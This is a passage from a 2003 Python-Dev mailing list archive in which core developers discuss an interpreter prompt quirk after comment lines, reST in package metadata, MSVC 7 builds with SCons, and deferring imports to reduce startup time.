        ./config.status
config.status: configure
        ./config.status --recheck

in some of my makefiles.  I just type "make Makefile" and it does all it
needs to do.

-- Sjoerd Mullender <sjoerd@acm.org>


From skip@pobox.com  Wed May  7 15:24:46 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 09:24:46 -0500
Subject: [Python-Dev] odd interpreter feature
Message-ID: <16057.5934.556547.671279@montanaro.dyndns.org>

I was editing the tutorial just now and noticed the secondary prompt (...)
in a situation where I didn't think it was appropriate:

    >>> # The argument of repr() may be any Python object:
    ... repr(x, y, ('spam', 'eggs'))
    "(32.5, 40000, ('spam', 'eggs'))"

It's caused by the trailing colon at the end of the comment.  I verified it
using current CVS:

    >>> hello = 'hello, world\n'
    >>> hellos = repr(hello)
    >>> print hellos
    'hello, world\n'
    >>> # hello:
    ...
    >>>

Shouldn't the trailing colon be ignored in comments?  Bug, feature or wart?

Skip


From mwh@python.net  Wed May  7 15:37:37 2003
From: mwh@python.net (Michael Hudson)
Date: Wed, 07 May 2003 15:37:37 +0100
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <16057.5934.556547.671279@montanaro.dyndns.org> (Skip
 Montanaro's message of "Wed, 7 May 2003 09:24:46 -0500")
References: <16057.5934.556547.671279@montanaro.dyndns.org>
Message-ID: <2mwuh26cwe.fsf@starship.python.net>

Skip Montanaro <skip@pobox.com> writes:

> I was editing the tutorial just now and noticed the secondary prompt (...)
> in a situation where I didn't think it was appropriate:
>
>     >>> # The argument of repr() may be any Python object:
>     ... repr(x, y, ('spam', 'eggs'))
>     "(32.5, 40000, ('spam', 'eggs'))"
>
> It's caused by the trailing colon at the end of the comment.

Python 2.3b1+ (#1, May  6 2003, 18:00:11) 
[GCC 2.96 20000731 (Red Hat Linux 7.2 2.96-112.7.2)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> # no it's not
... 

Cheers,
M.

-- 
  The Internet is full.  Go away.
                      -- http://www.disobey.com/devilshat/ds011101.htm


From amk@amk.ca  Wed May  7 15:35:39 2003
From: amk@amk.ca (A.M. Kuchling)
Date: Wed, 07 May 2003 10:35:39 -0400
Subject: [Python-Dev] Re: odd interpreter feature
In-Reply-To: <16057.5934.556547.671279@montanaro.dyndns.org>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
Message-ID: <b9b5h5$mhk$1@main.gmane.org>

Skip Montanaro wrote:
> It's caused by the trailing colon at the end of the comment. 

No, it's just the comment.

 >>> # hello
... print 'foo'
foo
 >>>

--amk




From tim.one@comcast.net  Wed May  7 15:42:22 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 07 May 2003 10:42:22 -0400
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <16057.5934.556547.671279@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBHEJAB.tim.one@comcast.net>

[Skip Montanaro]
> I was editing the tutorial just now and noticed the secondary prompt (...)
> in a situation where I didn't think it was appropriate:
>
>     >>> # The argument of repr() may be any Python object:
>     ... repr(x, y, ('spam', 'eggs'))
>     "(32.5, 40000, ('spam', 'eggs'))"
>
> It's caused by the trailing colon at the end of the comment.  I
> verified it using current CVS:
>
>     >>> hello = 'hello, world\n'
>     >>> hellos = repr(hello)
>     >>> print hellos
>     'hello, world\n'
>     >>> # hello:
>     ...
>     >>>
>
> Shouldn't the trailing colon be ignored in comments?  Bug,
> feature or wart?

This changed at some very early point in Python's life.  I don't think the
trailing colon is relevant:

>>> 1+2
3
>>> # hello
...
>>>



From skip@pobox.com  Wed May  7 15:51:10 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 09:51:10 -0500
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <2mwuh26cwe.fsf@starship.python.net>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <2mwuh26cwe.fsf@starship.python.net>
Message-ID: <16057.7518.148868.168522@montanaro.dyndns.org>

    >>> # no it's not
    ... 

Damn, thanks...

I guess the question still remains though, should the secondary prompt be
issued after a comment?

Skip


From fdrake@acm.org  Wed May  7 15:55:45 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 7 May 2003 10:55:45 -0400
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEBHEJAB.tim.one@comcast.net>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <LNBBLJKPBEHFEDALKOLCCEBHEJAB.tim.one@comcast.net>
Message-ID: <16057.7793.975960.566995@grendel.zope.com>

Tim Peters writes:
 > This changed at some very early point in Python's life.  I don't think the
 > trailing colon is relevant:
 > 
 > >>> 1+2
 > 3
 > >>> # hello
 > ...
 > >>>

I think this is also a point on which Python and Jython differ, but I
don't have Jython installed anywhere nearby to test with.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From guido@python.org  Wed May  7 16:02:21 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 07 May 2003 11:02:21 -0400
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: "Your message of Wed, 07 May 2003 09:24:46 CDT."
 <16057.5934.556547.671279@montanaro.dyndns.org>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
Message-ID: <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>

> I was editing the tutorial just now and noticed the secondary prompt (...)
> in a situation where I didn't think it was appropriate:
> 
>     >>> # The argument of repr() may be any Python object:
>     ... repr(x, y, ('spam', 'eggs'))
>     "(32.5, 40000, ('spam', 'eggs'))"
> 
> It's caused by the trailing colon at the end of the comment.  I verified it
> using current CVS:
> 
>     >>> hello = 'hello, world\n'
>     >>> hellos = repr(hello)
>     >>> print hellos
>     'hello, world\n'
>     >>> # hello:
>     ...
>     >>>
> 
> Shouldn't the trailing colon be ignored in comments?  Bug, feature or wart?

It's not the trailing colon.  Any line that consists of only a comment
does this:

  >>> 
  >>> # foo
  ... 
  >>>  # foo
  ...    
  >>> 12 # foo
  12
  >>> 

And yes, it's a wart, but I don't know how to fix it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas@xs4all.net  Wed May  7 16:16:20 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 7 May 2003 17:16:20 +0200
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <16057.7793.975960.566995@grendel.zope.com>
References: <16057.5934.556547.671279@montanaro.dyndns.org> <LNBBLJKPBEHFEDALKOLCCEBHEJAB.tim.one@comcast.net> <16057.7793.975960.566995@grendel.zope.com>
Message-ID: <20030507151620.GI26254@xs4all.nl>

On Wed, May 07, 2003 at 10:55:45AM -0400, Fred L. Drake, Jr. wrote:

> Tim Peters writes:
>  > This changed at some very early point in Python's life.  I don't think the
>  > trailing colon is relevant:
>  > 
>  > >>> 1+2
>  > 3
>  > >>> # hello
>  > ...
>  > >>>

> I think this is also a point on which Python and Jython differ, but I
> don't have Jython installed anywhere nearby to test with.

I do:

debian:~ > jython
Jython 2.1 on java1.1.8 (JIT: null)
Type "copyright", "credits" or "license" for more information.
>>> 1+2
3
>>> # hello
>>> ^D

(This is why I use Debian... 'apt-get install jython' :-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From skip@pobox.com  Wed May  7 16:16:29 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 10:16:29 -0500
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16057.9037.913362.225855@montanaro.dyndns.org>

    Guido> And yes, it's a wart, but I don't know how to fix it.

I did a little digging and noticed this comment dating from v 2.5 (Jul 91):

    /* Lines with only whitespace and/or comments
       shouldn't affect the indentation and are
       not passed to the parser as NEWLINE tokens,
       except *totally* empty lines in interactive
       mode, which signal the end of a command group. */

Not surprisingly, given the age of the change, your fingerprints are all
over it. ;-)

I suspect if the code beneath that comment was executed only when the
indentation level is zero we'd be okay, but I don't know if the tokenizer
has that sort of information available.  I'll do a little more poking
around.

Skip



From akuchlin@mems-exchange.org  Wed May  7 16:19:16 2003
From: akuchlin@mems-exchange.org (Andrew Kuchling)
Date: Wed, 07 May 2003 11:19:16 -0400
Subject: [Python-Dev] Relying on ReST in the core?
Message-ID: <E19DQhQ-0006Dt-00@ute.mems-exchange.org>

For PEP 314, it's been suggested that the Description field 
be written in RestructuredText.  This change doesn't affect the
Distutils code, because the Distutils just takes this field and 
copies it into an output file; programs using the metadata defined 
in PEP 314 would have to be able to process ReST, though.

I know the plan is to eventually add ReST/docutils to the standard
library, and that this isn't happening for Python 2.3.  Question: is
it OK to make something in the core implicitly depend on ReST before
ReST is in the core?  Until docutils is added, there's always the risk
that we decide to never add ReST to the core, or ReST 2.0 changes the
format completely, or we decide XYZ is much better, or something like
that.

--amk                                                    (www.amk.ca)
IAGO: Poor and content is rich and rich enough.
      -- _Othello_, III, iii


From guido@python.org  Wed May  7 16:32:39 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 07 May 2003 11:32:39 -0400
Subject: [Python-Dev] Relying on ReST in the core?
In-Reply-To: "Your message of Wed, 07 May 2003 11:19:16 EDT."
 <E19DQhQ-0006Dt-00@ute.mems-exchange.org>
References: <E19DQhQ-0006Dt-00@ute.mems-exchange.org>
Message-ID: <200305071532.h47FWdX03514@pcp02138704pcs.reston01.va.comcast.net>

> For PEP 314, it's been suggested that the Description field 
> be written in RestructuredText.  This change doesn't affect the
> Distutils code, because the Distutils just takes this field and 
> copies it into an output file; programs using the metadata defined 
> in PEP 314 would have to be able to process ReST, though.
> 
> I know the plan is to eventually add ReST/docutils to the standard
> library, and that this isn't happening for Python 2.3.  Question: is
> it OK to make something in the core implicitly depend on ReST before
> ReST is in the core?  Until docutils is added, there's always the risk
> that we decide to never add ReST to the core, or ReST 2.0 changes the
> format completely, or we decide XYZ is much better, or something like
> that.

I think it's okay to make this a recommendation, with the suggestion
to be conservative in using reST features.  Since a description is
usually only a paragraph long, I think that should be okay.

--Guido van Rossum (home page: http://www.python.org/~guido/)
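
(As one illustration of that recommendation, a minimal distutils sketch
where the long description uses only conservative reST.  The package
metadata is made up, and the mapping of the PEP 314 Description field to
distutils' long_description argument is an assumption here.)

from distutils.core import setup

setup(
    name="example",                      # hypothetical package
    version="0.1",
    description="An example package",
    long_description="""\
Example
=======

A short description written in *conservative* reStructuredText:
a heading, a paragraph, and nothing fancier.
""",
)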


From guido@python.org  Wed May  7 16:33:31 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 07 May 2003 11:33:31 -0400
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: "Your message of Wed, 07 May 2003 10:16:29 CDT."
 <16057.9037.913362.225855@montanaro.dyndns.org>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>
 <16057.9037.913362.225855@montanaro.dyndns.org>
Message-ID: <200305071533.h47FXVf03526@pcp02138704pcs.reston01.va.comcast.net>

>     Guido> And yes, it's a wart, but I don't know how to fix it.
> 
> I did a little digging and noticed this comment dating from v 2.5 (Jul 91):
> 
>     /* Lines with only whitespace and/or comments
>        shouldn't affect the indentation and are
>        not passed to the parser as NEWLINE tokens,
>        except *totally* empty lines in interactive
>        mode, which signal the end of a command group. */
> 
> Not surprisingly, given the age of the change, your fingerprints are all
> over it. ;-)
> 
> I suspect if the code beneath that comment was executed only when the
> indentation level is zero we'd be okay, but I don't know if the tokenizer
> has that sort of information available.  I'll do a little more poking
> around.

Please do.  The indentation level should be easily available, since it
is computed by the tokenizer.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Wed May  7 17:15:35 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 11:15:35 -0500
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <200305071533.h47FXVf03526@pcp02138704pcs.reston01.va.comcast.net>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>
 <16057.9037.913362.225855@montanaro.dyndns.org>
 <200305071533.h47FXVf03526@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16057.12583.500034.130135@montanaro.dyndns.org>

    Guido> Please do.  The indentation level should be easily available,
    Guido> since it is computed by the tokenizer.

Alas, it's more complicated than just the indentation level of the current
line.  I need to know if the previous line was indented, which I don't think
the tokenizer knows (at least examining *tok in gdb under various conditions
suggests it doesn't).

I see the following possible cases (there are perhaps more, but I think they
are similar enough to ignore here):

    >>> if x == y:
    ...   # hello
    ...   pass
    ... 
    >>> if x == y:
    ...   x = 1
    ... # hello
    ...   pass
    ... 
    >>> x = 1
    >>> # hello
    ... 
    >>> 

Only the last case should display the primary prompt after the comment is
entered.  The other two correctly display the secondary prompt.  It's
distinguishing the second and third cases in the tokenizer without help from
the parser that's the challenge.

Oh well.  Perhaps it's a wart best left alone.

Skip


From brian@sweetapp.com  Wed May  7 18:02:19 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Wed, 07 May 2003 10:02:19 -0700
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <ud6ivxbgx.fsf@boost-consulting.com>
Message-ID: <010501c314ba$6b8dbef0$21795418@dell1700>

> > That is information about the core ABI. I do need to be concerned
> > about changes in the libraries, as well, in particular about
> > incompatibilities resulting from multiple copies of the C library. 
> > You said you don't know much about that.
> 
> I can find out almost as easily, if you have specific questions.

But the actual question that we would like to answer is quite broad:
what are all of the possible compatibility problems associated with
using a VC6 compiled DLL with a VC7 compiled application?

Assuming that only changed runtime data structures are going to be a
problem, knowing which ones cannot be passed between the two versions
would be nice. Below is a list of the standard types defined by
Microsoft's VC6 runtime library (taken from the VC6 docs):

clock_t
_complex
_dev_t
div_t, ldiv_t
_exception
FILE
_finddata_t, _wfinddata_t, _wfinddatai64_t
_FPIEEE_RECORD
fpos_t
_HEAPINFO
jmp_buf
lconv
_off_t
_onexit_t
_PNH
ptrdiff_t
sig_atomic_t
size_t
_stat
time_t
_timeb
tm
_utimbuf
va_list
wchar_t
wctrans_t
wctype_t
wint_t

Cheers,
Brian 



From greg_spencer@acm.org  Wed May  7 17:58:03 2003
From: greg_spencer@acm.org (Greg Spencer)
Date: Wed, 7 May 2003 10:58:03 -0600
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB8B1E2.2050108@dmsware.com>
Message-ID: <FMELJMKFIBGPDAJJDKINEEPNDPAA.greg_spencer@acm.org>

Well, I'm almost done with the SCons integration for both VC6 and VC7.  Just
some tests to write and integration into the current codeline to do.

Paolo, I'm not sure what you mean by "full" support for VC7, but here's what
I'm working on:

1) SCons writes out and maintains (as a "product" of the build) a .dsw and
.dsp file for VC6, or an .sln and .vcproj file for VC7.

2) The project and solution files contain "External Makefile" targets, which
in MSVC means that it will launch an external command when the "build"
button is pressed.

3) The project files contain all of the sources configured in the SCons
file, and you can include as many additional files as you would like.  The
SConscript file that generated the .dsp or .vcproj file is automatically
included in the source list so you can edit it from the IDE.

With this scheme, you can browse the class hierarchy, edit resource files,
build the project, double-click on errors (if any :-), edit source files
from the IDE, launch the executable (if any) in the debugger, lather, rinse,
repeat.

The build is then completely controlled by the Python SConscripts, with the
full flexibility that offers, and the project files are now just products of
the build that will be blown away and regenerated any time they need to be
rebuilt.

The only things I've discovered that you can't do with this scheme are
insert ActiveX controls (because the menu items are disabled) and build
individual object files.

At first glance, it seems like the logical choice for VS integration is to
build a plugin to Visual Studio, but for VS6, there aren't really enough
trigger events to capture the appropriate information at the right times, so
it's not really feasible.

For VS7, I think things are much more promising in the plugin department,
but truthfully, I'm not sure there's much added value.  You could insert new
ActiveX controls with the wizard and build individual files, sure.  But do
you really want to change build settings from within the IDE's dialogs?  I
haven't really decided how this would even work.  Probably you'd need a
third configuration file that both the VS7 tool and the SConscript could
share so that they could get their build setting information.  Yet another
config file, and now you'd have to keep the .sln and .vcproj files too,
making a total of four files that control the build.  They'd be in sync, but
one file is always better than four.  Also, this only works for VS7, and
it's complex.

I'm still considering a VS7 plugin as a possible future direction, but I
need some compelling reasons to do it.  I've used the "External Makefile"
scheme with classic Cons for four years now, and I haven't had any major
complaints from anyone -- they're just overjoyed that their build is
automated and "just works", and they can still use the IDE for 90% of what
they used it for before.  Not to mention all the benefits of using a build
system like SCons (centralized setting of build parameters for all projects,
for instance).

I hope that addresses your needs.  If you have suggestions or questions,
feel free to e-mail me.

BTW, I don't subscribe to python-dev, so be sure to CC me in this thread.

				-Greg.

P.S. Thanks for creating a language that a Perl guy can learn in a week.
And I thought shifting from classic cons to scons would be hard... :-)

-----Original Message-----
From: Paolo Invernizzi [mailto:paoloinvernizzi@dmsware.com]
Sent: Wednesday, May 07, 2003 1:13 AM
To: python-dev@python.org
Cc: Mark Hammond; greg_spencer@acm.org
Subject: Re: [Python-Dev] MS VC 7 offer


Mark Hammond wrote:

>Another thing to consider is the "make" environment.  If we don't use
>DevStudio, then presumably our existing project files will become useless.
>Not a huge problem, but a real one.  MSVC exported makefiles are not
>designed to be maintained.  I'm having good success with autoconf and Python
>on other projects, but that would raise the barrier to including cygwin in
>your build environment.
>
I think the next release of scons (www.scons.org) will have full
support for building targets using VC6 *project* files, and full support
for VC7.
Actually it also has support for cygwin and mingw...

So I think it is possible to have an automated way of building VC7 Python
based only on some scons scripts and the VC6 project files...
The possible goal is to keep working with the VC6 IDE as now, and have a
simple build script able to automatically build the VC7 version, tracking
changes..

I've inserted Greg Spencer, who I know is working on this... surely he
can bring us more details.


---
Paolo Invernizzi.






From jepler@unpythonic.net  Wed May  7 18:06:18 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 12:06:18 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030507170618.GI27125@unpythonic.net>

On Tue, May 06, 2003 at 07:35:40PM +0200, Martin v. Löwis wrote:
> That would be easy to determine: Just disable the block
> 
> #if defined(Py_USING_UNICODE) && defined(HAVE_LANGINFO_H) && defined(CODESET)
> 
> in pythonrun.c, and see whether it changes anything. To my knowledge,
> this is the only cause of loading encodings during startup on Unix.

With this change, I typically see
real    0m0.020s
user    0m0.020s
sys     0m0.000s
instead of
real    0m0.022s
user    0m0.020s
sys     0m0.000s

The number of successful open()s decreases, but not by much:
# before change
$ strace -e open ./python-2.3 -S -c pass 2>&1 | grep -v ENOENT | wc -l
     46
# after change
$ strace -e open ./python -S -c pass 2>&1 | grep -v ENOENT | wc -l
     39

What about this line?  It seems to be the cause of a bunch of imports,
including the sre stuff:
    /* pythonrun.c */
        PyModule_WarningsModule = PyImport_ImportModule("warnings");

Jeff


From patmiller@llnl.gov  Wed May  7 18:25:57 2003
From: patmiller@llnl.gov (Pat Miller)
Date: Wed, 07 May 2003 10:25:57 -0700
Subject: [Python-Dev] odd interpreter feature
Message-ID: <3EB941A5.5070003@llnl.gov>

Skip writes:


>    >>> # hello:
>    ...
>    >>>
> 
> Shouldn't the trailing colon be ignored in comments?  Bug, feature or wart?

I figured it was a feature...  Taking the view that any source block asks
for continuations seemed natural, so I assumed Guido intended it that way ;-)

If the comments were active objects (like doc strings), then it would
be the desired association.
 >>> # About to do something tricky
... tricky()
 >>>


Pat

-- 
Patrick Miller | (925) 423-0309 | http://www.llnl.gov/CASC/people/pmiller

All you need in this life is ignorance and confidence, and then success is
sure. -- Mark Twain



From martin@v.loewis.de  Wed May  7 18:48:41 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 07 May 2003 19:48:41 +0200
Subject: [Python-Dev] bsddb185 module changes checked in
In-Reply-To: <085D82A5-808D-11D7-A6E2-0030655234CE@cwi.nl>
References: <085D82A5-808D-11D7-A6E2-0030655234CE@cwi.nl>
Message-ID: <m3of2e1wcm.fsf@mira.informatik.hu-berlin.de>

Jack Jansen <Jack.Jansen@cwi.nl> writes:

> On SGI Irix 6.5 (MIPSpro Compilers: Version 7.2.1) it tries to build
> it, and fails. It complains about "u_int" and such not being
> defined. There's magic at the top of /usr/include/db.h for defining
> various types optionally, and that's as far as my understanding
> went.

I would not be worried about that too much. An Irix user who cares
about that will propose a solution, if there are Irix users who care
about that.

Regards,
Martin



From greg_spencer@acm.org  Wed May  7 19:25:11 2003
From: greg_spencer@acm.org (Greg Spencer)
Date: Wed, 7 May 2003 12:25:11 -0600
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB8B1E2.2050108@dmsware.com>
Message-ID: <FMELJMKFIBGPDAJJDKINAEPODPAA.greg_spencer@acm.org>

Actually, on re-reading your mail, I realize that you might just be talking
about getting VC7 to work well with SCons (since it currently only knows
about how to find VC6).   I've got that part done, and it'll be in with the
project file stuff.

				-Greg.

-----Original Message-----
From: Paolo Invernizzi [mailto:paoloinvernizzi@dmsware.com]
Sent: Wednesday, May 07, 2003 1:13 AM
To: python-dev@python.org
Cc: Mark Hammond; greg_spencer@acm.org
Subject: Re: [Python-Dev] MS VC 7 offer


Mark Hammond wrote:

>Another thing to consider is the "make" environment.  If we don't use
>DevStudio, then presumably our existing project files will become useless.
>Not a huge problem, but a real one.  MSVC exported makefiles are not
>designed to be maintained.  I'm having good success with autoconf and Python
>on other projects, but that would raise the barrier to including cygwin in
>your build environment.
>
I think the next release of scons (www.scons.org) will have full
support for building targets using VC6 *project* files, and full support
for VC7.
Actually it also has support for cygwin and mingw...

So I think it is possible to have an automated way of building VC7 Python
based only on some scons scripts and the VC6 project files...
The possible goal is to keep working with the VC6 IDE as now, and have a
simple build script able to automatically build the VC7 version, tracking
changes..

I've inserted Greg Spencer, who I know is working on this... surely he
can bring us more details.


---
Paolo Invernizzi.






From jepler@unpythonic.net  Wed May  7 19:30:26 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 13:30:26 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <20030507170618.GI27125@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de> <20030507170618.GI27125@unpythonic.net>
Message-ID: <20030507183025.GJ27125@unpythonic.net>

On Wed, May 07, 2003 at 12:06:18PM -0500, Jeff Epler wrote:
> What about this line?  It seems to be the cause of a bunch of imports,
> including the sre stuff:
>     /* pythonrun.c */
>         PyModule_WarningsModule = PyImport_ImportModule("warnings");

With this *and* the unicode stuff removed, I see runtimes like this:
$ time ./python -S -c pass
real    0m0.008s
user    0m0.010s
sys     0m0.000s

and opens are nearly down to 2.2 levels:
$ strace -e open ./python -S -c pass 2>&1 | grep -v ENOENT | wc
     11      44     489
$ strace -e open /usr/bin/python -S -c pass 2>&1 | grep -v ENOENT | wc
      8      32     355
(the differences are libstdc++, libgcc_s, and librt)

With *just* the import of warnings removed, I get this:
$ time ./python -S -c pass
real    0m0.017s
user    0m0.010s
sys     0m0.010s
.. and the import of sre is back.  I guess it's used in both warnings.py
and encodings/__init__.py

Jeff


From jepler@unpythonic.net  Wed May  7 19:52:46 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 13:52:46 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <20030507183025.GJ27125@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de> <20030507170618.GI27125@unpythonic.net> <20030507183025.GJ27125@unpythonic.net>
Message-ID: <20030507185245.GL27125@unpythonic.net>

On Wed, May 07, 2003 at 01:30:26PM -0500, Jeff Epler wrote:
> .. and the import of sre is back.  I guess it's used in both warnings.py
> and encodings/__init__.py

In encodings.__init__.py, the only use of re is for the
normalize_encoding function.  It could potentially be replaced with only
string operations:
    # translate all offending characters to whitespace
    _norm_encoding_trans = string.maketrans(...)

    def normalize_encoding(encoding):
        encoding = encoding.translate(_norm_encoding_trans)
        # let the str.split machinery take care of splitting
        # only once on repeated whitespace
        return "_".join(encoding.split())
.. or the import of re could be moved inside normalize_encoding.
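
A minimal sketch of what that string-only version might look like (the
exact set of "offending" characters here is an assumption, not taken from
the real module):

    import string

    # build a 256-entry table mapping every non-alphanumeric byte to a space
    _offending = ''.join([chr(i) for i in range(256)
                          if not chr(i).isalnum()])
    _norm_encoding_trans = string.maketrans(_offending, ' ' * len(_offending))

    def normalize_encoding(encoding):
        # translate all offending characters to whitespace ...
        encoding = encoding.translate(_norm_encoding_trans)
        # ... and let str.split collapse the runs before rejoining
        return "_".join(encoding.split())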

In warnings.py, re is used in two functions, filterwarnings() and
_setoption().  It's probably safe to move 'import re' inside these
functions. I'm guessing the 'import lock' warnings.py problem doesn't
apply when parsing options or adding new warning filters.

Furthermore, filterwarnings() will have to be changed to not use
re.compile() when message is "" (the resulting RE is always successfully
matched) since several filterwarnings() calls are already performed by
default, but always with message="".
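
A rough sketch of the shape that change could take (simplified; the real
function also validates its arguments, and the matching code would then
have to treat None as "matches anything"):

    _filters = []          # stand-in for warnings.filters

    def filterwarnings(action, message="", category=Warning,
                       module="", lineno=0, append=0):
        # only import re and compile patterns when there is something
        # to match; "" always matched everything anyway
        msg = mod = None
        if message or module:
            import re
            if message:
                msg = re.compile(message, re.I)
            if module:
                mod = re.compile(module)
        item = (action, msg, category, mod, lineno)
        if append:
            _filters.append(item)
        else:
            _filters.insert(0, item)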

These changes would prevent the import of 're' at startup time, which
appears to be the real killer. (see my module import timings in an
earlier message)


From skip@pobox.com  Wed May  7 20:05:06 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 14:05:06 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <20030507185245.GL27125@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de>
 <20030507170618.GI27125@unpythonic.net>
 <20030507183025.GJ27125@unpythonic.net>
 <20030507185245.GL27125@unpythonic.net>
Message-ID: <16057.22754.582272.377803@montanaro.dyndns.org>

    Jeff> In encodings.__init__.py, the only use of re is for the
    Jeff> normalize_encoding function.  It could potentially be replaced with only
    Jeff> string operations:
    ...
    Jeff> .. or the import of re could be moved inside normalize_encoding.

I don't know if this still holds true, but at one point during the 2.x
series I think it was pretty expensive to perform imports inside functions,
much more expensive than in 1.5.2 at least (maybe right after nested scopes
were introduced?).  If that is still true, moving the import might be false
economy.

Skip

"Some people, when confronted with a problem, think 'I know, I'll use regular
expressions.'  Now they have two problems." -- Jamie Zawinski



From jepler@unpythonic.net  Wed May  7 20:42:17 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 14:42:17 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <16057.22754.582272.377803@montanaro.dyndns.org>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de> <20030507170618.GI27125@unpythonic.net> <20030507183025.GJ27125@unpythonic.net> <20030507185245.GL27125@unpythonic.net> <16057.22754.582272.377803@montanaro.dyndns.org>
Message-ID: <20030507194215.GM27125@unpythonic.net>

On Wed, May 07, 2003 at 02:05:06PM -0500, Skip Montanaro wrote:
> I don't know if this still holds true, but at one point during the 2.x
> series I think it was pretty expensive to perform imports inside functions,
> much more expensive than in 1.5.2 at least (maybe right after nested scopes
> were introduced?).  If that is still true, moving the import might be false
> economy.

$ ./python Lib/timeit.py -s "def f(): import sys" "f()"
100000 loops, best of 3: 3.34 usec per loop
$ ./python Lib/timeit.py -s "def f(): pass" "import sys; f()"
100000 loops, best of 3: 3.3 usec per loop
$ ./python Lib/timeit.py -s "def f(): pass" "f()"
1000000 loops, best of 3: 0.451 usec per loop
$ ./python Lib/timeit.py 'import sys'
100000 loops, best of 3: 2.88 usec per loop

About 2.8usec would be added to each invocation of the functions in
question, about the same as the cost of a global-scope import.  This
means that you lose overall as soon as the function is called twice.

.. but this was about speeding python startup, not just speeding python.
<.0375 wink>

Jeff


From aleax@aleax.it  Wed May  7 21:57:26 2003
From: aleax@aleax.it (Alex Martelli)
Date: Wed, 7 May 2003 22:57:26 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <16057.22754.582272.377803@montanaro.dyndns.org>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030507185245.GL27125@unpythonic.net> <16057.22754.582272.377803@montanaro.dyndns.org>
Message-ID: <200305072257.26085.aleax@aleax.it>

On Wednesday 07 May 2003 09:05 pm, Skip Montanaro wrote:
>     Jeff> In encodings.__init__.py, the only use of re is for the
>     Jeff> normalize_encoding function.  It could potentially be replaced
> with only Jeff> string operations:
>     ...
>     Jeff> .. or the import of re could be moved inside normalize_encoding.
>
> I don't know if this still holds true, but at one point during the 2.x
> series I think it was pretty expensive to perform imports inside functions,
> much more expensive than in 1.5.2 at least (maybe right after nested scopes
> were introduced?).  If that is still true, moving the import might be false
> economy.

Doesn't seem to be true in 2.3, if I understand what you're saying:

[alex@lancelot src]$ python Lib/timeit.py -s'def f(): pass' 'import math; f()'
100000 loops, best of 3: 4.04 usec per loop

[alex@lancelot src]$ python Lib/timeit.py -s'def f(): import math' 'pass; f()'
100000 loops, best of 3: 4.05 usec per loop

or even

[alex@lancelot src]$ python Lib/timeit.py -s'import math' -s'def f(): pass' 
'reload(math); f()'
